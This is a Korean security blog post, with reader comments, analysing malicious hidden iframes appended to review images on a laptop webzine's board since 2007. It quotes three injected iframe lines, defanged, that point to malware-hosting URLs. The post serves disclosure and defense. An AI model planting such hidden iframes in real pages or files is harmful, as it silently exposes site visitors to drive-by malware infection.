국내 노트북 전문 웹진으로 유명한 노트○○ 사이트의 노트북 리뷰 게시판을 이용하던 중 보안 제품에서 진단하는 증상에 대한 제보가 들어와서 확인을 해보았습니다.
Trend Micro Titanium Maximum Security 2014 제품을 통해 확인을 해보면 특정 리뷰 게시글을 오픈하는 과정에서 다수의 그림 파일(JPG, GIF)을 HTML_IFRAME.AZ 진단명으로 진단하고 있습니다.
실제 진단되는 그림 파일의 위치를 확인해보면 공통적으로 노트북 리뷰에 작성된 그림 파일에 대해 일괄적으로 진단이 이루어지고 있는 것을 확인할 수 있었습니다.
연결 URL 정보를 살펴보면 리뷰 게시글에서 사용된 그림 파일 일체가 진단되고 있으며, 그림 파일 내부에는 맨 하단 영역에 다음과 같은 악성 iframe이 삽입되어 있는 것을 발견할 수 있습니다.
<iframe src=h**p://b2en.com/com/s.htm width=0 height=0></iframe>
<iframe src=h**p://www.66ki.cn/rong.htm width=100 height=0></iframe>
<iframe src=h**p://www.66ki.cn/rong.htm width=100 height=0></iframe>
도대체 해당 iframe이 언제 삽입되었는지 노트북 리뷰 게시글을 전체적으로 검토해본 결과 첫 번째 리뷰가 작성된 2002년 게시글부터 2007년 9월 29일 리뷰글까지 연결되어 있었으며, 이를 통해 2007년 9월 30일경에 리뷰 게시글에 첨부된 그림 파일에 악성 iframe이 삽입된 것으로 보입니다.
해당 업체에서는 이 문제에 대해 인지 여부는 알 수 없지만 그 후 6년이 넘는 기간 동안 아무런 조치없이 그대로 접속자에게 노출시키고 있으며, 이로 인하여 과거 작성된 리뷰글을 오픈하는 과정에서 백신 프로그램의 진단 문제가 발생하고 있습니다.
현재는 워낙 오래된 악성 URL 값으로 인해 시스템 감염으로 연결되지는 않겠지만, 해당 게시판 취약점 문제가 해결되지 않았다면 차후라도 유사한 공격으로 인해 악성코드 유포지로 악용될 소지가 있다고 판단됩니다.
6년 동안 Iframe이 삽입된 그림이 여전히 있다는 것도 신기하지만, 더 놀라운건 확인하기 위해 02년글부터 07년글까지 모조리 살펴봤다는게 후덜덜하네요 ㄷㄷ;; 역시 대단하십니다.
어차피 기계적으로 삽입하기 때문에 기간별로 대표적인 것만 추출해보면 금새 알 수 있습니다. 대단하거 아니예요.^^;
역시 벌새님의 정체는 벌새로 위장한 매라는 사실이 밝혀졌군요
정보를 제공해 주신 분이 잘 알려줘서 그렇습니다.^^
6년동안이라니..너무 오랫동안삽입이된것같습니다.
아마 사진 교체하기에는 너무 많아서 그런게 아닐까 싶습니다.
게시해 주셔서 감사합니다.
6년이라니 충격적이군요....
맑은하루님이시군요.^^
유익하게 보고갑니당^^